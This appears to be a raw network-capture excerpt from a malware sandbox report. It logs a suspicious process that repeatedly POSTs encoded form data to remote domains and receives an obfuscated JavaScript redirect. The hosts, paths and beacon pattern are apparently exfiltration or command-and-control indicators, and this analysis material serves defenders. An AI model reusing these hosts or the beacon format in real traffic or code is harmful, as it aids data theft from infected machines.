                                                                            Data Ascii: jNn=IYlouYrI0yQl1UhjbhrWg9A4XW4aDAbXtcqQZ2cDb3pAvvZh2/rT9+WaSXJu8H08nFh0ZCzh2MZq44g+sMHvA3m37j+OAwRiGhkY3OrFfzUmrUKfalDc6DOlVUeg9cFBlOkX4fw2xo6AVCaNZRoCMCZ5aJXqmgHNm7g3ZTnmrg/NxeUG4eRA1o7vTGfNfll9gfHOlXE=
                                                                            Timestamp: Jan 11, 2025 03:32:23.034081936 CET | Bytes transferred: 1104 | Direction: IN
                                                                            HTTP/1.1 404 Not Found
                                                                            Date: Sat, 11 Jan 2025 02:32:22 GMT
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LQJUFn2ysBWSq%2FkbYxs9KHa05nO%2Fhqtq5JuaY7%2BG1YqK%2FFw8x%2BtrmHEViHoNM2Xo067RpJbE5ZoWSljrDizrFfaEtCDQAtJfy0i6z6rJ%2BgthntL0loS8KykX%2B0SfK%2B6giIL4GqCZwwI%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 90017ef5b9192394-EWR
                                                                            Content-Encoding: gzip
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1970&min_rtt=1970&rtt_var=985&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=766&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Ascii: f0LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8*0


                                                                            Session ID: 24
                                                                            Source IP: 192.168.2.8
                                                                            Source Port: 49736
                                                                            Destination IP: 188.114.97.3
                                                                            Destination Port: 80
                                                                            PID: 5960
                                                                            Process: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            Timestamp: Jan 11, 2025 03:32:24.837517023 CET | Bytes transferred: 786 | Direction: OUT
                                                                            POST /o362/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.rgenerousrs.store
                                                                            Origin: http://www.rgenerousrs.store
                                                                            Referer: http://www.rgenerousrs.store/o362/
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 224
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Data Ascii: jNn=IYlouYrI0yQlz1RjZGHWsNA5d24aJgactcmQZ0wTYB5AvLJh16HT++WaZ3JRzn1RnFsJZHTh2Mlq44w+t/vsDHm5wD+MOQRiGhkY3OP8f34mrkafbAvb3jOiWUegqMFFlOkl4dFTxu+AVGKNYAoBGCZzXpWulTDHuIYlbCfZuz7s5Ilsi8ZG2oTETF37aS4V68X+7ARIX+Lh7dlU3dim6MAnm8da
                                                                            Timestamp: Jan 11, 2025 03:32:25.593369007 CET | Bytes transferred: 1096 | Direction: IN
                                                                            HTTP/1.1 404 Not Found
                                                                            Date: Sat, 11 Jan 2025 02:32:25 GMT
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mWxO7Sd32UzVCZ2kFvXHtmYu8vBvniSi%2B%2F8iSkx0pjlqBTgs6fXJ8dpelLXn2X5VpyIm56XsR2THPQwulnhKWtpFGiteuarT5NqgEepPMpZwXnzykEE1LIDk5nqg09DXM818gU9Phys%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 90017f05ab61334e-EWR
                                                                            Content-Encoding: gzip
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1964&min_rtt=1964&rtt_var=982&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=786&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: e5LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8b*0


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            25 | 192.168.2.8 | 49737 | 188.114.97.3 | 80 | 5960 | C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jan 11, 2025 03:32:27.378837109 CET | 1803 | OUT | POST /o362/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.rgenerousrs.store
                                                                            Origin: http://www.rgenerousrs.store
                                                                            Referer: http://www.rgenerousrs.store/o362/
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 1240
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Data Raw: 6a 4e 6e 3d 49 59 6c 6f 75 59 72 49 30 79 51 6c 7a 31 52 6a 5a 47 48 57 73 4e 41 35 64 32 34 61 4a 67 61 63 74 63 6d 51 5a 30 77 54 59 42 78 41 76 38 68 68 32 5a 66 54 2f 2b 57 61 48 48 4a 55 7a 6e 31 70 6e 46 30 4e 5a 48 58 78 32 4b 68 71 34 65 38 2b 71 4f 76 73 59 33 6d 35 2f 6a 2b 42 41 77 51 34 47 68 30 44 33 4f 66 38 66 33 34 6d 72 69 57 66 50 6c 44 62 6b 54 4f 6c 56 55 66 76 39 63 46 74 6c 4f 74 53 34 64 41 6d 32 65 65 41 4d 6d 61 4e 56 53 77 42 4b 43 5a 31 5a 4a 57 49 6c 55 4b 64 75 4d 34 2b 62 43 37 7a 75 7a 44 73 70 4f 49 61 6c 50 67 52 73 4b 54 4c 59 6e 54 4f 42 6a 73 61 35 4f 6e 73 32 77 70 4a 51 36 48 62 30 39 35 56 36 65 2f 70 34 74 46 30 74 6f 30 55 77 33 33 51 67 71 46 46 57 4c 34 50 36 7a 66 48 4c 6a 66 66 70 45 6c 2b 41 65 53 38 52 44 67 6c 63 61 77 61 59 6d 7a 70 53 57 79 65 5a 35 6b 41 68 74 77 43 78 51 79 6a 4a 75 79 54 69 65 73 37 66 34 4f 70 62 50 32 6d 72 43 77 73 79 6c 4d 71 62 66 36 48 49 70 43 51 52 48 71 37 77 59 2f 4a 2f 55 53 57 79 64 50 6a 4e 76 34 70 55 61 32 6a 74 68 [TRUNCATED]
                                                                            Data Ascii: jNn= [TRUNCATED]
                                                                            Jan 11, 2025 03:32:28.124409914 CET | 1099 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Sat, 11 Jan 2025 02:32:28 GMT
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k%2F287T8cH1w00yYo3ZmhBPc30vknL7YQRDptOjLxPbAeS%2FkzqTzg7d32sZPQcYffsicCkkE%2Bu8h9SyTpFBRzvnMVuDGfcFf4X%2Fezl3V8FUmD6x2QCcDo4KwrZqEu%2F11Mo9XRDUUmpJo%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 90017f158ef042ee-EWR
                                                                            Content-Encoding: gzip
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1747&min_rtt=1747&rtt_var=873&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1803&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: f0LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8*0


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            26 | 192.168.2.8 | 49738 | 188.114.97.3 | 80 | 5960 | C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jan 11, 2025 03:32:29.923579931 CET | 495 | OUT | GET /o362/?3P=ZxaxIFQ&jNn=FaNItuPk5TcZ9HdRFxGis99OVV5mBzvNwqypTl8+VCtQ49ZNgIXGwO2PY0xc/TpBxHoMd3n/rLst/5dAk+rqD1uW41+CEwYhbzlB+9nxdj867jKwdHPO1yv4Ykeg9vUq/A== HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.rgenerousrs.store
                                                                            Connection: close
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Jan 11, 2025 03:32:30.683577061 CET | 1117 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Sat, 11 Jan 2025 02:32:30 GMT
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BAzwjkMM9rm2er2wRcJjgkkLF7Kh2HMqNKClCBm7gmxZBG6R%2BBrezs0qbOvf%2BYZDVCDXgG%2FthxSbLOnP%2BKRF3oTE3%2BMAmtkgzp5Dt1EHCD%2BK0y3mvpsuFKdqsh21ikgQdmTGQ3Wquo4%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 90017f256cfac35e-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1637&min_rtt=1637&rtt_var=818&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=495&delivery_rate=0&cwnd=76&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 31 31 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 67 65 6e 65 72 6f 75 73 72 73 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: 119<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.rgenerousrs.store Port 80</address></body></html>0


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            27 | 192.168.2.8 | 49739 | 154.88.22.101 | 80 | 5960 | C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jan 11, 2025 03:32:35.746030092 CET | 745 | OUT | POST /jhb8/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.t91rl7.pro
                                                                            Origin: http://www.t91rl7.pro
                                                                            Referer: http://www.t91rl7.pro/jhb8/
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 204
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Data Raw: 6a 4e 6e 3d 35 54 66 56 39 67 71 61 42 6c 6b 4c 6f 47 59 41 6e 45 4c 46 45 6f 67 30 64 6b 55 2f 76 2f 63 55 42 79 39 4b 77 57 64 2b 57 30 32 45 79 31 57 58 30 53 66 6b 48 5a 76 32 4f 41 57 31 75 2f 78 51 78 56 57 2b 66 76 66 79 2b 75 41 5a 57 33 6b 57 6a 65 72 59 30 4a 30 69 31 42 6d 69 63 74 46 55 58 69 6d 4a 79 31 31 65 59 46 4b 6a 71 78 52 6e 39 35 77 50 74 63 62 59 5a 74 4e 39 68 6b 49 73 6d 50 69 75 49 59 2f 63 65 6a 61 72 76 75 56 68 6c 37 53 32 46 45 4a 53 50 2f 6c 4d 54 51 43 2f 54 32 4f 65 33 43 68 30 65 7a 57 38 71 56 6b 44 6c 4f 61 31 4a 78 4c 47 75 52 2b 31 38 48 68 48 46 31 6e 41 76 6b 6b 3d
                                                                            Data Ascii: jNn=5TfV9gqaBlkLoGYAnELFEog0dkU/v/cUBy9KwWd+W02Ey1WX0SfkHZv2OAW1u/xQxVW+fvfy+uAZW3kWjerY0J0i1BmictFUXimJy11eYFKjqxRn95wPtcbYZtN9hkIsmPiuIY/cejarvuVhl7S2FEJSP/lMTQC/T2Oe3Ch0ezW8qVkDlOa1JxLGuR+18HhHF1nAvkk=
                                                                            Jan 11, 2025 03:32:36.631516933 CET | 364 | IN | HTTP/1.1 200 OK
                                                                            Server: nginx
                                                                            Date: Sat, 11 Jan 2025 02:32:36 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Strict-Transport-Security: max-age=31536000
                                                                            Content-Encoding: gzip
                                                                            Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 16 46 91 55 9e 55 3e 79 81 a6 be e1 39 86 29 95 a6 e5 c9 b9 16 66 fe 21 e9 15 be 81 b6 b6 ea 9a 36 fa 50 13 01 96 c0 e2 a3 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: 67)N.,(ON,VPV/Ji%IAf>FUU>y9)f!6PZ0


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            28 | 192.168.2.8 | 49740 | 154.88.22.101 | 80 | 5960 | C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jan 11, 2025 03:32:38.302222967 CET | 765 | OUT | POST /jhb8/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.t91rl7.pro
                                                                            Origin: http://www.t91rl7.pro
                                                                            Referer: http://www.t91rl7.pro/jhb8/
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 224
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Data Raw: 6a 4e 6e 3d 35 54 66 56 39 67 71 61 42 6c 6b 4c 36 58 49 41 6b 6e 6a 46 4d 6f 67 33 53 45 55 2f 6b 66 63 51 42 79 35 4b 77 55 78 75 57 6e 53 45 72 55 6d 58 31 54 66 6b 4c 35 76 32 47 67 57 77 68 66 78 74 78 56 61 32 66 71 6e 79 2b 75 55 5a 57 31 38 57 6a 74 54 5a 79 4a 30 33 2b 68 6d 67 54 4e 46 55 58 69 6d 4a 79 31 68 6b 59 46 43 6a 71 46 56 6e 39 59 77 41 79 73 62 62 52 4e 4e 39 6c 6b 49 6f 6d 50 6a 39 49 62 37 32 65 6d 57 72 76 72 70 68 72 4b 53 31 4d 45 4a 51 4c 2f 6c 64 57 7a 76 77 4d 58 2f 6c 33 44 46 4e 66 7a 43 48 76 6a 56 70 2f 73 53 7a 4b 78 6a 74 75 53 57 44 35 77 38 76 66 57 33 77 78 7a 79 48 53 54 37 61 58 57 52 5a 66 38 51 74 53 55 75 43 34 69 58 34
                                                                            Data Ascii: jNn=5TfV9gqaBlkL6XIAknjFMog3SEU/kfcQBy5KwUxuWnSErUmX1TfkL5v2GgWwhfxtxVa2fqny+uUZW18WjtTZyJ03+hmgTNFUXimJy1hkYFCjqFVn9YwAysbbRNN9lkIomPj9Ib72emWrvrphrKS1MEJQL/ldWzvwMX/l3DFNfzCHvjVp/sSzKxjtuSWD5w8vfW3wxzyHST7aXWRZf8QtSUuC4iX4
                                                                            Jan 11, 2025 03:32:39.172046900 CET | 364 | IN | HTTP/1.1 200 OK
                                                                            Server: nginx
                                                                            Date: Sat, 11 Jan 2025 02:32:39 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Strict-Transport-Security: max-age=31536000
                                                                            Content-Encoding: gzip
                                                                            Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 16 46 91 55 9e 55 3e 79 81 a6 be e1 39 86 29 95 a6 e5 c9 b9 16 66 fe 21 e9 15 be 81 b6 b6 ea 9a 36 fa 50 13 01 96 c0 e2 a3 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: 67)N.,(ON,VPV/Ji%IAf>FUU>y9)f!6PZ0


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            29 | 192.168.2.8 | 49741 | 154.88.22.101 | 80 | 5960 | C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jan 11, 2025 03:32:40.850877047 CET | 1782 | OUT | POST /jhb8/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.t91rl7.pro
                                                                            Origin: http://www.t91rl7.pro
                                                                            Referer: http://www.t91rl7.pro/jhb8/
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 1240
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Data Raw: 6a 4e 6e 3d 35 54 66 56 39 67 71 61 42 6c 6b 4c 36 58 49 41 6b 6e 6a 46 4d 6f 67 33 53 45 55 2f 6b 66 63 51 42 79 35 4b 77 55 78 75 57 6e 61 45 33 79 36 58 7a 77 33 6b 46 5a 76 32 49 41 57 78 68 66 78 4b 78 56 43 79 66 71 37 49 2b 74 73 5a 58 51 67 57 6c 63 54 5a 68 70 30 33 78 42 6d 6c 63 74 45 4d 58 6a 4c 43 79 31 78 6b 59 46 43 6a 71 45 6c 6e 74 5a 77 41 70 73 62 59 5a 74 4d 79 68 6b 49 55 6d 50 36 49 49 61 50 4d 43 43 71 72 76 50 31 68 70 34 71 31 44 45 4a 57 4f 2f 6b 41 57 7a 69 77 4d 55 61 4c 33 44 78 72 66 78 69 48 75 31 45 65 37 59 57 6e 49 67 7a 6c 69 67 32 55 39 78 55 4c 41 55 6e 37 32 77 6a 70 46 6e 33 6d 41 47 4d 58 51 63 35 67 45 43 4b 6d 70 6c 75 48 45 45 77 73 66 50 37 63 4f 6f 30 63 4f 6b 61 35 64 6b 66 41 51 6f 65 6c 6b 66 33 71 67 59 74 2b 76 4b 61 59 2f 54 50 70 7a 72 4b 77 72 2b 69 44 2b 57 65 4c 51 55 2b 6d 77 53 56 6f 2f 4e 56 46 37 5a 74 74 72 2f 58 61 57 55 52 46 53 4b 44 61 62 56 4f 36 61 30 43 68 66 6b 50 48 65 31 35 4c 73 6a 73 4b 56 51 44 58 31 6d 38 51 55 50 43 4e 5a 46 [TRUNCATED]
                                                                            Data Ascii: jNn= [TRUNCATED]
                                                                            Jan 11, 2025 03:32:41.713254929 CET | 364 | IN | HTTP/1.1 200 OK
                                                                            Server: nginx
                                                                            Date: Sat, 11 Jan 2025 02:32:41 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Strict-Transport-Security: max-age=31536000
                                                                            Content-Encoding: gzip
                                                                            Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 16 46 91 55 9e 55 3e 79 81 a6 be e1 39 86 29 95 a6 e5 c9 b9 16 66 fe 21 e9 15 be 81 b6 b6 ea 9a 36 fa 50 13 01 96 c0 e2 a3 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: 67)N.,(ON,VPV/Ji%IAf>FUU>y9)f!6PZ0


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            30 | 192.168.2.8 | 49742 | 154.88.22.101 | 80 | 5960 | C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jan 11, 2025 03:32:43.389837980 CET | 488 | OUT | GET /jhb8/?jNn=0R31+Vq/Nm8msngZkniPPNslS216pvARFjw5y1poIV3xx1K38BT3Oq7zCSGYp4hHlG+YTfvzleF+eXVetOmv0JB40X+6ZYpMJWzP2nxEXACS3GxK9okeiaSzZusyrXZl7w==&3P=ZxaxIFQ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.t91rl7.pro
                                                                            Connection: close
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Jan 11, 2025 03:32:44.250277042 CET | 332 | IN | HTTP/1.1 200 OK
                                                                            Server: nginx
                                                                            Date: Sat, 11 Jan 2025 02:32:44 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Strict-Transport-Security: max-age=31536000
                                                                            Data Raw: 34 65 0d 0a 3c 73 63 72 69 70 74 3e 6c 6f 63 61 74 69 6f 6e 5b 27 68 27 2b 27 72 65 27 2b 27 66 27 5d 20 3d 20 61 74 6f 62 28 27 61 48 52 30 63 48 4d 36 4c 79 38 32 59 7a 49 7a 4c 6e 51 35 4d 57 6c 31 64 79 35 77 63 6d 38 36 4f 54 67 78 4d 51 3d 0d 0a 63 0d 0a 3d 27 29 3c 2f 73 63 72 69 70 74 3e 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: 4e<script>location['h'+'re'+'f'] = atob('aHR0cHM6Ly82YzIzLnQ5MWl1dy5wcm86OTgxMQ=c=')</script>0
